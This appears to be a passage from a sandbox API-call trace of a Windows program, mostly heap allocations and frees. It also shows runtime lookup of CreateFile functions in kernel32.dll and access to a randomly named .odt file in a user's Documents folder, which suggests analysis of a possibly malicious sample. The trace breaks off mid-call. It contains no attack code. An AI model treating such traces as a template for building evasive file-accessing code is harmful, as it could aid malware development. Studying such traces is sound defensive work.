HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0172.922] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0172.922] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.923] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0172.923] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0172.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0172.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0172.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0172.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd888 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0172.923] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0172.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0172.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0172.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0172.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0172.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0172.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0172.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0172.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0172.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0172.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0172.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0172.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0172.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0172.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0172.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0172.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0172.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0172.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0172.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0172.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0172.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0172.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0172.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0172.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0172.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0172.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0172.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0172.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0172.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0172.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0172.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0172.926] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0172.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0172.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0172.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0172.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0172.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0172.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0172.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0172.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0172.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0172.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.929] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0172.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bda68 [0172.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bda68, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0172.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.929] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0172.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0172.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda68 [0172.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bda68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0172.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.930] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0172.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0172.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0172.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0172.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0172.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa5f008 [0172.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt", cchWideChar=68, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 68 [0172.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0172.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt", cchWideChar=68, lpMultiByteStr=0x9aa4f8, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt", lpUsedDefaultChar=0x0) returned 68 [0172.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0172.931] HeapFree (in: 